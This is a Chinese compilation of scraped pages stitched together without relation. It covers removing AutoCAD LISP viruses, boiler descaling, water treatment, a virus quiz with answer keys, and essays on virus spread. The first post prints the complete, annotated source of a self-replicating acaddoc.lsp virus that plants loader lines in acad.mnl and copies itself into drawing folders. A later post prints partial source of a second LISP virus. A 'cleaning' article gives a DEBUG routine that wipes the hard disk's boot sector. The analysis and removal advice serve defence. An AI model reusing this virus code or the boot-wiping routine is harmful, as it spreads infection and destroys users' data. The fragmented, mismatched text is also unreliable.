AUTOCAD病毒的清除方法
acaddoc.lsp是一个专门针对CAD文件的病毒,在CAD软件
使用中主要表现的情况如下:
1、无法拷贝
2、在命令行提示需要执行一个宏
3、CAD会出莫名其妙的问题
解决方法:
关闭AutoCAD程序;
搜索所有acaddoc.lsp和acadapq.lsp文件
删除所有关acadapq.lsp(3,836字节) 和被感染的
acaddoc.lsp(27字节) (看文件大小);
重启AutoCAD,OK
ashan发表
LZ还说少了一个步骤:没有处理acad.mnl文件,这样的清除并不彻底,下次再打开带毒的dwg文件(这里并非指dwg文件本身带毒,而是指在该dwg文件下有acaddoc.lsp文件存在)后,系统又会感染病毒,偶曾经对这个cad病毒的代码做过详细分析,下面是原文,有兴趣的朋友可以详细看看:
最近自己的电脑中了CAD病毒,症状为打开一个dwg文件后,在该dwg文件所在目录下就会自动生成一个“acaddoc.lsp”文件,即使手工将其删除,下次打开dwg文件时又会自动生成。如果把dwg文件和acaddoc.lsp文件一起复制到另外一部未感染CAD病毒的电脑上,只要一打开该dwg文件,则该电脑就会被感染。因为这个CAD病毒是个lisp程序,花了些时间对病毒代码进行分析如下:
-----------------下面是病毒代码-----------------------------
(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq wpath (findfile "base.dcl"))
(setq wpath (substr wpath 1 (- (strlen wpath) 8))) ;wpath变量保存ACAD下support目录路径
(setq wwmnlwpath (getvar "menuname")) ;获得当前菜单名,这句没有用处,下面并未使用wwmnlwpath变量
(setq wnowdwg (getvar "dwgname")) ;获得当前打开图形文件名
(setq wwjqm (findfile wnowdwg)) ;wwjqm变量保存当前打开图形文件的完整路径
(setq wdwgwpath (substr wwjqm 1
( - (strlen wwjqm) (strlen wnowdwg)))) ;wdwgwpath变量保存当前打开图形文件所在路径
;;;alert
( setq f ( open "c:\\boot.dat" "w")) ;f变量为boot.dat文件句柄,c盘根目录下boot.dat文件若存在则
(write-line "[dang]" f) ;打开,不存在则创建,然后将当前打开图形文件所在路径和support
(write-line (strcat "ff=" wdwgwpath) f) ;目录路径写入boot.dat文件
(write-line (strcat "yy=" wpath) f)
(close f)
(setq boot (findfile "boot.dat")) ;获得boot.dat文件所在目录完整路径
(if (/= boot "") (command "_-vbarun" "ThisDrawing.hh")) ;这句是要运行一个名为“ThisDrawing.hh”的宏,但该宏并不存在
(setq wacadwpath (findfile "acaddoc.lsp")) ;wacadwpath变量保存当前加载的acaddoc.lsp文件所在目录
(setq wacadwpath (substr wacadwpath 1
(- (strlen wacadwpath) 11)))
(setq wns1 "" wns2 "")
(setq wlspbj 0) ;wlspbj变量是判断support目录下acaddoc.lsp文件是否已感染的
;;; ;标志,已感染为1,未感染为0
(setq wwjqm (strcat wpath "acaddoc.lsp")) ;wwjqm变量指向support目录下的acaddoc.lsp文件
(if (setq wwjm (open wwjqm "r")) ;wwjm变量为打开support目录下的acaddoc.lsp文件的句柄,若打开
(progn ;成功则进行处理
(while
(setq wwz (read-line wwjm)) ;逐行读取acaddoc.lsp文件内容,读取结束后,wns1中是倒数第2行
(setq wns1 wns2 ) ;内容,wns2中是最后一行的内容
(setq wns2 wwz)
)
(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”,
(if (= (substr wns1 8 7) "acadapq") ;若是则已感染
(setq wlspbj 1)
)
)
(close wwjm)
)
)
(setq wlspmnl 0) ;wlspmnl变量是判断support目录下acad.mnl文件是否已感染的标志,
;;; ;已感染为1,未感染为0
(setq wwjqm (strcat wpath "acad.mnl")) ;wwjqm变量指向support目录下的acad.mnl文件
(if (setq wwjm (open wwjqm "r" )) ;wwjm变量为打开support目录下的acad.mnl文件的句柄,若打开
(progn ;成功则进行处理
(while (setq wwz (read-line wwjm)) ;逐行读取acad.mnl文件内容,读取结束后,wns1中是倒数第2行内容
(setq wns1 wns2 ) ;wns2中是最后一行的内容
(setq wns2 wwz)
)
(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”,若是则
(if (= (substr wns1 8 7) "acadapq") ;已感染
(setq wlspmnl 1)
)
)
(close wwjm) ;关闭acad.mnl文件
)
)
(if (= wlspmnl 0) ;若acad.mnl文件未感染,则写入加载病毒的代码到acad.mnl文件的
(progn ;最后2行中
(setq wwjqm (strcat wpath
(strcat (chr 97) (chr 99) (chr 97)
(chr 100) (chr 46) (chr 109)
(chr 110) (chr 108)) )) ;障眼法,等于(strcat wpath "acad.mnl")
(setq wwjm (open wwjqm "a"))
(write-line (strcat "(load " (chr 34)
"acadapq" (chr 34) ")" ) wwjm)
(write-line "(princ)" wwjm)
(close wwjm)
)
)
(defun wwriteapp ()
(if (setq wwjm1 (open wnewacad "w"))
(progn
(setq wwjm (open woldacad "r"))
(while (setq wwz (read-line wwjm))
(write-line wwz wwjm1)
)
(close wwjm)
(close wwjm1)
)
)
)
(if (and (= wacadwpath wdwgwpath)
(/= wacadwpath wpath)) ;若加载的acaddoc.lsp文件和图形文件同目录
(progn
(if (= 0 wlspmnl) ;acad.mnl文件未感染
(progn
(setq woldacad (findfile "acaddoc.lsp")) ;在下面调用wwriteapp子程序读取图形文件目
录下的acaddoc.lsp文件
(setq wnewacad (strcat wpath "acadapq.lsp")) ;的内容,在support目录下创建acadapq.lsp 文件并将acaddoc.lsp
) ;文件的内容写入acadapq.lsp文件中
;;else (acad.mnl文件已感染)
(progn
(setq woldacad (strcat wpath "acadapq.lsp" )) ;在下面调用wwriteapp子程序读取support目录下的acadapq.lsp文件
(setq wnewacad (findfile "acaddoc.lsp")) ;的内容,写入图形目录下的acaddoc.lsp文件中
)
)
(if (= wlspbj 0) ;support目录下的acaddoc.lsp文件未感染
(progn ;下面代码将加载病毒程序的代码写入acaddoc.lsp文件的最后2行中
(setq wwjqm (strcat wpath "acaddoc.lsp" ))
(setq wwjm (open wwjqm "a"))
(write-line (strcat "(load " (chr 34)
"acadapq" (chr 34) ")" ) wwjm)
(write-line "(princ)" wwjm)
(close wwjm)
)
)
(wwriteapp)
)
;;else (若加载的是support目录下的acaddoc.lsp文件)
(progn
(if (/= wnowdwg "Drawing.dwg" ) ;当前打开文件不是新建图形文件
(progn
(setq woldacad (findfile "acadapq.lsp")) ;在图形文件目录下创建acaddoc.lsp文件,将acadapq.lsp
(setq wnewacad (strcat wdwgwpath "acaddoc.lsp")) ;文件的内容写入acaddoc.lsp文件中
(wwriteapp)
)
)
)
)
(setvar "cmdecho" wold_cmd)
(princ) ;下面的代码又是个障眼法,没什么作用
(setq strtopstr (strcat (chr 92) (chr 92) (chr 70)
(chr 83) (chr 49) (chr 92)
(chr 83) (chr 89) (chr 83)
(chr 49) (chr 92) (chr 87)
(chr 79) (chr 82) (chr 75)
(chr 92) (chr 80) (chr 76)))
-----------------病毒代码到此结束----------------------------
从以上对病毒代码的分析可知,该病毒的病毒文件有2个,一个为acadapq.lsp,位于ACAD 安装目录下的support目录下,另一个为acaddoc.lsp,位于当前打开的dwg文件所在目录下,2个病毒文件的内容相同。病毒的工作原理是利用了AutoCAD会自动加载acaddoc.lsp文件的特性,在ACAD启动时自动加载的是support目录下的acaddoc.lsp文件;而当打开一个dwg时,如果该dwg文件所在目录下有acaddoc.lsp文件,则会优先自动加载该acaddoc.lsp 文件,从而实现病毒的感染过程。
免疫方法:通过对病毒代码的分析,可以知道病毒是通过读取AutoCAD安装目录下support 目录下的acad.mnl和acaddoc.lsp文件的内容来判断电脑是否已感染病毒的,其判断方法为读取这2个文件中倒数第2行从第8个字符开始的7个字符是否为“acadapq”来进行判断,若是则表示已感染,不是表示未感染。既然如此,就可以通过欺骗病毒来达到免疫的目的。已感染病毒的电脑的acad.mnl文件和acaddoc.lsp文件的最后2行代码如下:………………
(load "acadapq")
(princ)
可以修改如下:
………………
(eval "acadapq")
(princ)
这样修改以后,病毒运行时仍会判断上述2个文件的倒数第2行从第8个字符开始的7个字符为“acadapq”,并以为电脑已感染病毒,但此时病毒程序acadapq.lsp其实已无法加载,从而实现了免疫。
清除方法:免疫毕竟是被动的,我们可以利用acad.mnl文件先于acaddoc.lsp文件加载的特性,通过在acad.mnl文件中加入病毒清除代码实现病毒的清除:
--------------------------------------------------------------------------------
;;以下为ACAD病毒免疫及清除代码,对名为“acadapq.lsp”的病毒有效
(setq virus_ex1 (findfile "c:\\boot.dat"))
(if virus_ex1 (vl-file-delete "c:\\boot.dat"))
(setq curdwg (getvar "dwgname")) ;获得当前打开dwg文件名称
(setq dwgpath (findfile curdwg)) ;获得包含当前打开dwg文件文件名的完全路径
(setq dwgdir (substr dwgpath 1 (- (strlen dwgpath) (strlen curdwg)))) ;获得当前打开dwg文件所在目录
(setq virus_ex2 (findfile (strcat dwgdir "acaddoc.lsp")))
(if virus_ex2 ;dwg文件所在目录下发现acaddoc.lsp文件,清除之
(progn
(alert (strcat "在“" dwgdir "”目录下发现acaddoc.lsp文件,该文件通常\n是病毒,点击“确定[OK]”直接删除该文件。"))
(vl-file-delete (strcat dwgdir "acaddoc.lsp"))
)
;;else (dwg文件所在目录下没有发现acaddoc.lsp文件)
(princ "\n当前打开的图形文件所在目录下未发现CAD病毒!\n")
)
(princ)
(eval "acadapq")
(princ)
把以上代码添加到acad.mnl文件的最后面,删除support目录下的病毒文件acadapq.lsp,这样就可以自动删除当前打开的dwg文件所在目录下的acaddoc.lsp文件了,从而实现了清除病毒的目的。
锅炉水垢清洗 锅炉水垢清洗 1.锅炉机械除垢 主要采用电动洗管器、扁铲、钢丝刷及手锤等工具进行机械除垢。此法比较简单,成本低,但劳动强度大,除垢效果差,易损坏金属表面,只适用于结垢面积小,且构造简单,便于机械工具接触到水垢的小型锅炉。近年来,由于清洗专用的高压水枪的应用,使水力冲洗的机械除垢发展较快,这种高压水力除垢的效果较使用原始的机械工具有很大的提高,且较为安全、方便。但目前高压水力除垢仍仅限于结构较简单的工业锅炉。 2.锅炉碱洗(煮)除垢 锅炉碱煮的作用主要是使水垢转型,同时促使其松动脱落。单纯的碱煮除垢效果较差,常常需与机械除垢配合进行。碱煮除垢对于以硫酸盐、硅酸盐为主的水垢有一定的效果,但对于碳酸盐水垢,则远不如酸洗除垢效果好。碱洗煮炉也常用于新安装锅炉的除锈和除油污,有时也用于酸洗前的除油清洗或垢型转化。 碱洗药剂用量应根据锅炉结垢及脏污的程度来确定。一般用于除垢时的用量(每吨水的用量)为:工业磷酸三钠5~10kg,碳酸钠3~6kg,或氢氧化钠2~4kg。这些碱洗药剂应先在溶液箱中配制成一定浓度,然后再用泵送人锅内,并循环至均匀。 碱煮除垢的方法与新锅炉煮炉基本相同,只是煮炉结束后,应打开锅炉的各检查孔,及时加以机械(或高压水力)辅助清垢,
以免松软的水垢重新变硬。 3.锅炉酸洗除垢 目前在各种除垢方法中,以酸洗除垢效果较好,但酸洗工艺若不合适或控制不当也会影响除垢效果或腐蚀金属,有时甚至会严重影响锅炉的安全运行。为了确保锅炉酸洗的安全和质量,国家质量技术监督局专门制定颁发了《锅炉化学清洗规则》,并规定:从事锅炉化学清洗的单位必须取得省级及省级以上锅炉压力容器安全监察机构的资格认可,才能承担相应级别的锅炉化学清洗。无相应资格的任何单位和个人(包括用炉单位),都不得擅自酸洗锅炉。 锅炉在酸洗前应预先取有代表性的垢样进行化验,制定清洗方案;进酸开始时须在锅炉内和酸箱内挂入腐蚀指标片(直到退酸时取出);酸洗工艺流程及酸洗液的温度、浓度、流速、酸洗时间等应按清洗方案实施和控制;清洗过程中应不断取样化验并如实作好记录。清洗结束后,用炉单位、清洗单位和锅炉安全监察部门应对清洗质量进行验收。工业锅炉的酸洗质量要求如下: (1)除垢率 (1)清洗以碳酸盐垢为主的水垢,除垢面积应达到原水垢覆盖面积的80%以上。 (2)清洗硅酸盐或硫酸盐水垢,除垢面积应达到原水垢覆盖面积的60%以上。 锅炉如除垢率低于上述规定,或虽达到规定要求但锅炉主要受热面上仍覆盖有难以清理的水垢时,应在维持锅水碱度达到水质标准上限值的条件下,将锅炉运行一个月左右再停炉,用人工
一、中键不能用的病毒 步骤:1、关闭cad程序,显示所有文件和文件夹;显示已知程序的后缀; 2、搜索acad.lsp,全部彻底删除; 3、搜索acadappp.lsp,一般就一个,彻底删除(注意搜索要在高级选项加上隐藏文件夹); 4、打开cad,在工具--选项--配置--重置,再试一下,ok了吧!!! 二、时间病毒 手工清除方法:首先请关闭CAD后,再搜索所有磁盘内的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件,(记住一定要搜索完所有的磁盘,如C、D、E、F、G等等。)然后将所有搜索到的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件全部删除。 常见问题是C:\Program Files\autocad***目录(子目录)下的 acad.fas与lcm.fas是在全部查找时找不到的,请手动进入目录再行查找删除! 不想进去目录查找也可以输入下面的字符到CAD命令行: (while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a)) 注意:上面带括号一个字都不能少哦!这样就行了! 如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行?: (setvar "mtexted" ".") 靠,玩cad就指这个混了,全部贡献了。!!!!! 要把你的机子、U盘全部照上面的方法查一遍,以后见到acad.lsp这个东西先删!!! 只要在同一个文件夹中(不论是U盘还是硬盘)有图纸和acad.lsp,打开任何图纸之后就会在C盘产生一个acadappp.lsp病毒母文件,以后在这台机子任意打开图纸,就会在打开图纸的文件夹中产生一个acad.lsp文件,说白了就是中毒了!!!!按我上面的方法处理染毒的机子就ok了!并不存在某个文件安全不安全的讲法,只存在.dwg文件安全不安全的讲法
计算机病毒入侵途径与预防对策3篇-计算机病毒论文-计算机论文 ——文章均为WORD文档,下载后可直接编辑使用亦可打印—— (一) 1、计算机病毒的传播模式 1.1SIS传播模式。所谓SIS计算机病毒传播方法,就是将计算机网络中的所有个体进行了划分,分成两种状态:易感染状态和感染状态,一旦计算机中的易感染节点收到病毒的侵袭后,那么这个节点就会变成感染节点,即使这个节点在治愈之后,还是极有可能再次受到感染。因此,即便是那些没有受到病毒威胁的节点,也被视为易感染节点。这也就说明,计算机病毒能够进行反复的传播,会在计算机中长存。 1.2SRI传播模式。SRI与SIS有其相似之处,不过也有很大的不同,不同之处就在于是将所有节点划分成了三种形态,比515多了一种免疫状态。处于免疫状态的节点对计算机病毒有很强的抵抗能力,一般来说,它不会被同一类的计算机病毒感染,而且不会传播病毒。当计算机处于免疫状态时,就表明已经从病毒的反复传播中摆脱了出来,这时也可被称为移除状态。
1.3SDIR传播模式。SDIR是指计算机病毒的传播和清除过程。SDIR是将计算机中的节点分成了四种状态,即Removde、Deteeted、Inefetions、Suseeptible这四种状态。Removed状态是指计算机节点已经具备了很强的抵抗病的能力;Detectde状态是指计算机节点已经受到了病毒感染,但是病毒已经被检测出来,而且不会再向外传播;nIefctinoS状态是指计算机节点不仅被感染,并且还能够继续传播;SsllcPebtiel状态,是指计算机节点已经被计算机病毒感染。SDIR充分考虑到了免疫延迟的现象,把计算机病毒的传播过程分成了两个阶段:一个阶段是在反病毒程序之后,容易感染或者说已经感染的节点,如果再继续接受疫苗的话,也有有可能变成免疫节点的;另一个阶段是在反病毒程序之前,在网络中的病毒进行快速传播的同时,疫苗本身不会进行传播,这样的话,感染节点就会变成易感染节点。 1.4SEIR传播模式。SEIR传播模式与SIR传播模式相比,多了一种潜伏的状态。潜伏状态是指计算机节点已经受到病毒的感染,但是这种病毒的特征还没有显现出来。SEIR模式指的是计算机病毒在进行传播之后,具有一定的延迟性,它将会在计算机中潜伏一段时间,等待用户将其激活。而且潜伏状态下的节点即使是得到了有效的治愈,还是有可能变成免疫节点或者是易感染节点。所以我们说SEIR是515与SRI 的结合,它充分考虑到了病毒的传播过程。
彻底清除计算机病毒的简便方法 目前,彻底清除计算机病毒的常用方法是:先对硬盘进行低级格式化,然后分区,最后高级格式化。这种做法不仅费时,而且也损伤硬盘。那么能否既不需要对硬盘进行低级格式化,又能彻底清除计算机病毒呢?笔者经过实践,认为答案是肯定的。因为引导型病毒主要是驻留在硬盘0柱面0磁头1扇区开始的引导区内,只要把硬盘引导区的内容全部清零,即可达到清除引导型病毒的目的。 这可用DEBUG命令编写一段小程序,并把它写入一个干净的DOS系统盘上,这种程序的功能是把硬盘引导区内所有字节全部清零,从而在清除硬盘引导区全部数据的同时也清除含在其中的病毒代码。 由于该程序很短,可用无毒DOS系统盘启动计算机后调用该盘0的DEBUG命令编写的如下一段程序并把它写入磁盘,具体操作为: A:\>DEBUG -A100 0100 MOV CX,0200 ;清除1个扇区(512个单元) MOV DI,0200 ;内存起始地址为0200H,送于DI寄存器中 MOV AL,00 ;把立即数00存放到寄存器AL中 0108 MOV [DI],AL ;把AL中的数据写入DI所指的内存单元中 INC DI ; 内存地址加1 DEC CX ; 内存单元个数减1
JNZ 0108 ;不为零转移 MOV AX,0301 ;AH=03是写盘,AL=01是写入一个扇区 MOV BX,0200 ;BX=0200是从内存0200H处开始读数据 MOV CX,0001 ;LH=00为0磁头,CL=01为第一个扇区 MOV DX,0080 ;DH=00为0柱面,DL=80为硬盘 INT 13 ;调用DOS软中断之硬盘读写控制程序 011D INT 20 ;程序运行结束 -N A: https://www.doczj.com/doc/6515130426.html,;给文件命名,意为:对C盘引导区填满零 -BBX BX 0000 :00 -RCX CX 0000 :ID ;输入文件长度10个字节 -W ;写盘 Writing 0001D bytes -Q A:\> 至此,清除硬盘引导区程序https://www.doczj.com/doc/6515130426.html,已建立在A盘上。 为了确保计算机能真正做到干净无毒,除了应清除硬盘引导区病毒外,还应清除驻留在CMOS 芯片里的病毒。否则,当计算机启动读取CMOS信息时,病毒将从CMOS芯片中被引入到内存
计算机病毒 一、单选:(共55题) 1. 防病毒软件( )所有病毒。 A. 是有时间性的,不能消除 B. 是一种专门工具,可以消除 C. 有的功能很强,可以消除 D. 有的功能很弱,不能消除 参考答案:A 2. 下面关于计算机病毒描述正确的有( )。 A. 计算机病毒是程序,计算机感染病毒后,可以找出病毒程序,进而清除它 B. 只要计算机系统能够使用,就说明没有被病毒感染 C. 只要计算机系统的工作不正常,一定是被病毒感染了 D. 软磁盘写保护后,使用时一般不会被感染上病毒 参考答案:D 3. 下列说法中错误的是( )。 A. 计算机病毒是一种程序 B. 计算机病毒具有潜伏性 C. 计算机病毒是通过运行外来程序传染的 D. 用防病毒卡和查病毒软件能确保微机不受病毒危害 参考答案:D 4. 关于计算机病毒的传播途径,不正确的说法是( )。 A. 通过软件的复制 B. 通过共用软盘 C. 通过共同存放软盘 D. 通过借用他人的软盘 参考答案:C 5. 目前最好的防病毒软件的作用是( )。 A. 检查计算机是否染有病毒,消除已感染的任何病毒 B. 杜绝病毒对计算机的感染 C. 查出计算机已感染的任何病毒,消除其中的一部分 D. 检查计算机是否染有病毒,消除已感染的部分病毒 参考答案:D 6. 文件型病毒传染的对象主要是( )类文件。 A. DBF B. DOC C. COM和EXE D. EXE和DOC 参考答案:C 7. 宏病毒是随着Office软件的广泛使用,有人利用宏语言编制的一种寄生于( )的宏中的计算机病毒。 A. 应用程序 B. 文档或模板 C. 文件夹 D. 具有“隐藏”属性的文件 参考答案:B
计算机病毒处理常用办法 1、预防病毒的好习惯 1)建立良好的安全习惯。 对一些来历不明的邮件及附件不要打开,不要上一些不太了解的网站、不要执行从Internet 下载后未经杀毒处理的软件,不要共享有读写权限的文件夹或磁盘,机器间文件的拷贝要先进行病毒查杀; 2)经常升级安全补丁。 一部分病毒是通过系统安全漏洞进行传播的,像红色代码、尼姆达、SQL Slamer、冲击波、震荡波等病毒,我们应密切关注病毒、漏洞预警,即使修补系统漏洞补丁; 3)使用复杂的用户口令。 有许多病毒是通过猜测用户口令的方式攻击系统的。因此使用复杂的口令,会提高计算机的病毒防范能力;一般来讲,复杂的口令须具备:长度8位或8位以上,口令中必须含字母、数字而且字母分大小写; 4)迅速隔离受感染的计算机。 当计算机发现病毒或异常时应立刻断网,以防止计算机受到更多的感染,或者成为传播源; 5)了解一些病毒知识。 这样可以及时发现新病毒并采取相应措施,使自己的计算机免受病毒破坏。如果能了解一些注册表知识,就可以定期看一看注册表的自启动项是否有可疑键值;如果了解一些内存知识,就可以经常看看内存中是否有可疑程序。 6)安装专业的防毒软件进行全面监控。 在病毒日益增多的今天,应该使用防病毒软件进行病毒防范,在安装了防病毒软件之后,还要经常进行病毒库的升级,并打开实时监控(如文件双向监控)器进行监控。 2、怎样区别计算机病毒与故障 在清除计算机病毒的过程中,有些类似计算机病毒的现象纯属由计算机硬件或软件故障引起,同时有些病毒发作现象又与硬件或软件的故障现象相类似,如引导型病毒等。这给用户造成了了困惑,许多用户往往在用各种病毒软件查不出病毒时就去格式化硬盘,不仅影响了工作、减少了硬盘的寿命,而且还不能从根本上解决问题。所以,有必要正确区分计算机的病毒与故障,下面的经验供用户参考: 1)计算机病毒的现象 在一般情况下,计算机病毒总是依附某一系统软件或用户程序中进行繁殖和扩散,病毒发作时危及计算机的正常工作,破坏数据与程序,侵犯计算机资源。计算机在感染病毒后,往往有一定规律性地出现一些异常现象,比如: A. 屏幕显示异常。屏幕显示出不是由正常程序产生的画面或字符串, 出现显示混乱现象; B. 程序装载时间明显增长, 文件运行速度显著下降; C. 用户没有访问的设备出现异常工作信号; D. 磁盘出现莫名其妙的文件和坏块, 卷标发生变化; E. 系统自行引导; F. 丢失数据或程序, 文件字节数发生变化; G. 内存空间、磁盘空间异常减小; H. 异常死机或自动重启; I. 磁盘访问时间比平时明显增长; J. 系统引导时间明显增长。 2)与病毒现象类似的硬件故障 硬件的故障范围不太广泛,比较容易确认,但在处理计算机异常现象时易被忽略。排除硬件故障是解决问题的第一步。
水垢处理控制方法 循环水处理系统里的水垢控制技术: 1、水垢的控制循环水系统中最易生成的水垢是碳酸钙垢,水垢控制即是防止碳酸钙的析出,大致有以下几类方法。 ⑴从补充冷却水中除去成垢的钙、镁离子在补充水进入循环水系统之前进行软化处理,除去Ca2+、Mg2+,也就形不成水垢。目前常用的软化方法有两种:一是离子交换树脂法,该法适于补充水量小的循环水系统间或采用;二是石灰软化法,即投加石灰,使Ca(HCO3)2反应生成CaCO3沉淀提前析出。该方法成本低,适于原水(尤其是暂时硬度大的结垢型原水)钙含量高,补充水量较大的循环冷却水系统。 ⑵加酸或通入CO2气体,降低PH值,稳定重碳酸盐在循环水中加酸(通常为硫酸)或通入CO2气体,降低PH值,使下列平衡左移,重碳酸盐处于稳定状态。 加酸法目前仍有使用,关键是控制好加酸量,否则酸量过多会加速设备腐蚀。 通CO2气体同样应注意控制好PH值,否则循环水通过冷却塔时,由于CO2的溢出,CaCO3在塔内结晶,堵塞填料,形成钙垢转移现象。该方法在某些化肥厂、化工厂及电厂等有CO2气体源的企业仍有推广使用的价值。 ⑶投加阻垢剂在循环水中投加阻垢剂,破坏CaCO3的结晶增长过程,以达到控制水垢形成的目的。目前常用的阻垢剂有聚磷酸盐、有机多元膦酸、有机磷酸脂、聚丙烯酸盐等,这也是目前应用最广的控制水垢的方法。 2、污垢的控制控制污垢,可从下面几个方面努力: ⑴对补充水进行预处理,降低浊度 ⑵做好循环水水质处理 ⑶投加分散剂可将粘合在一起的泥团杂质等分散成微粒悬浮于水中,随水流流动而不沉积,从而减少污垢对传热的影响,部分悬浮物还可随排污排出。 ⑷增加旁滤设备如果在系统中增设旁滤设备,控制好旁流量和进、出旁流设备的浊度,就可保持系统长时间运行下的浊度在控制指标内,减少污垢形成。 3、循环冷却水系统金属腐蚀的控制循环冷却水系统金属腐蚀的控制方法常用的主要有以下四种: ⑴添加缓蚀剂缓蚀剂是一种用于腐蚀介质中抑制金属腐蚀的添加剂,它用量少,不会改变腐蚀介质的性质,不需特殊投加设备,也不需对设备表面进行处理。因此,使用缓蚀剂是一种经济效益较高且适应性较强的金属防护措施。 在敞开式循环水系统中,常用的缓蚀剂有硅酸盐、钼酸盐、锌盐、磷酸盐、聚磷酸盐、有机多元膦酸、巯基苯并噻唑(MBT)、苯并三唑(BTA)和甲基苯并三唑(TTA)、硫酸亚铁等,并且为了减轻环境富营养化的压力,目前更趋向于使用后面几种有机膦酸盐和低磷缓蚀剂。
一种CAD病毒的清除与防范措施 雪山飞猪 QQ534455 近来又出现一种AutoCAD病毒,该病毒与以往CAD病毒不同。干净的CAD 系统当打开DWG图时,如果该图所在目录下有ACADDOC.LSP文件(基本为病毒传播文件),ACADDOC.LSP就会运行。 1.病毒的特征与传播方式 我们先看看病毒代码,代码如下: (setq flagx t) (setq bz "(setq flagx t)") (defun app(source target bz / flag flag1 wjm wjm1 text) (setq flag nil) (setq flag1 t) (if (findfile target) (progn (setq wjm1 (open target "r")) (while (setq text (read-line wjm1)) (if (= text bz) (setq flag1 nil)) );while (close wjm1) );progn );if (if flag1 (progn (setq wjm (open source "r")) (setq wjm1 (open target "a")) (write-line (chr 13) wjm1) (while (setq text (read-line wjm)) (if (= text bz) (setq flag t)) (if flag
(progn (write-line text wjm1) );progn );if );while (close wjm1) (close wjm) );progn );if );defun (setvar "cmdecho" 0) (setq acadmnl (findfile "acad.mnl")) (setq acadmnlpath (vl-filename-directory acadmnl)) (setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl")) (setq mnlnum (length mnlfilelist)) (setq acadexe (findfile "acad.exe")) (setq acadpath (vl-filename-directory acadexe)) (setq support (strcat acadpath "\\support")) (setq lspfilelist (vl-directory-files support "*.lsp")) (setq lspfilelist (append lspfilelist (list "acaddoc.lsp"))) (setq lspnum (length lspfilelist)) (setq dwgname (getvar "dwgname")) (setq dwgpath (findfile dwgname)) (if dwgpath (progn (setq acaddocpath (vl-filename-directory dwgpath)) (setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp")) (setq mnln 0) (while (< mnln mnlnum)
计算机病毒在网络中泛滥已久,而其在局域网中也能快速繁殖,导致局域网计算机的相互感染,使整个公司网络瘫痪无法正常运做,其损失是无法估计的。 一、局域网病毒入侵原理及现象 一般来说,计算机网络的基本构成包括网络服务器和网络节点站(包括有盘工作站、无盘工作站和远程工作站)。计算机病毒一般首先通过各种途径进入到有盘工作站,也就进入网络,然后开始在网上的传播。具体地说,其传播方式有以下几种。 (1)病毒直接从工作站拷贝到服务器中或通过邮件在网内传播; (2)病毒先传染工作站,在工作站内存驻留,等运行网络盘内程序时再传染给服务器; (3)病毒先传染工作站,在工作站内存驻留,在病毒运行时直接通过映像路径传染到服务器中 (4)如果远程工作站被病毒侵入,病毒也可以通过数据交换进入网络服务器中一旦病毒进入文件服务器,就可通过它迅速传染到整个网络的每一个计算机上。而对于无盘工作站来说,由于其并非真的"无盘"(它的盘是网络盘),当其运行网络盘上的一个带毒程序时,便将内存中的病毒传染给该程序或通过映像路径传染到服务器的其他的文件上,因此无盘工作站也是病毒孽生的温床。
由以上病毒在网络上的传播方式可见,在网络环境下,网络病毒除了具有可传播性、可执行性、破坏性等计算机病毒的共性外,还具有一些新的特点。 (1)感染速度快 在单机环境下,病毒只能通过介质从一台计算机带到另一台,而在网络中则可以通过网络通讯机制进行迅速扩散。根据测定,在网络正常工作情况下,只要有一台工作站有病毒,就可在几十分钟内将网上的数百台计算机全部感染。 (2)扩散面广 由于病毒在网络中扩散非常快,扩散范围很大,不但能迅速传染局域网内所有计算机,还能通过远程工作站将病毒在一瞬间传播到千里之外。 (3)传播的形式复杂多样 计算机病毒在网络上一般是通过"工作站"到"服务器"到"工作站"的途径进 行传播的,但现在病毒技术进步了不少,传播的形式复杂多样。 (4)难于彻底清除e. 单机上的计算机病毒有时可以通过带毒文件来解决。低级格式化硬盘等措施能将病毒彻底清除。而网络中只要有一台工作站未能清除干净,就可使整个网络重新被病毒感染,甚至刚刚完成杀毒工作的一台工作站,就有可能被网上另一台带毒工作站所感染。因此,仅对工作站进行杀毒,并不能解决病毒对网络的危害。
计算机病毒的传播方式以及应对方法 摘要:目前计算机的应用遍及到社会各个领域,同时计算机病毒也给我们带来了巨大的破坏力和潜在威胁,为了确保计算机系统能够稳定运行以及信息的安全性,了解计算机病毒的一些特征、传播方式及防范措施十分必要。 关键词:计算机病毒分类传播方式预防查杀 一、计算机病毒的定义: 一般来讲,凡是能够引起计算机故障,能够破坏计算机中的资源(包括软件和硬件)的代码,统称为计算机病毒。它通常隐藏在一些看起来无害的程序中,能生成自身的拷贝并将其插入其他的程序中,执行恶意的行动,其具有以下几个特点: 1、传染性。计算机病毒会通过各种渠道从被感染的计算机扩散到未被感染的计 算机,在某些情况下造成被感染计算机工作失常甚至瘫痪。 2、潜伏性。有些计算机病毒并不是一侵入机器就对机器造成破坏,它可能隐藏 在合法的文件中,静静的呆几周或者几个月甚至几年,具有很强的潜伏性,一旦时机成熟就会迅速繁殖、扩散。 3、隐蔽性。计算机病毒是一种具有很高编程技巧、短小精悍的可执行程序,如 不经过程序代码分析或计算机病毒代码扫描,病毒程序与正常程序很难区分开来。 4、破坏性。任何计算机病毒侵入到机器中,都会对系统造成不同程度的影响, 轻者占有系统资源,降低工作效率,重者数据丢失,机器瘫痪。 除了上述四个特点,计算机病毒还具有不可预见性、可触发性、衍生性、针对性、欺骗性、持久性等特点。正是由于计算机具有这些特点,给计算机病毒的预防、检测和清除工作带来了很大的麻烦。 二、计算机病毒的分类: 1、系统病毒。系统病毒的前缀为: Win32 、PE、Win95 、W3 2、W95 等。这种 病毒的公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。 2、蠕虫病毒。蠕虫病毒的前缀是:Worm 。这种病毒的公有特性是通过网络或者 系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。 3、木马病毒。木马病毒其前缀是:Trojan,它是一种会在主机上未经授权就自 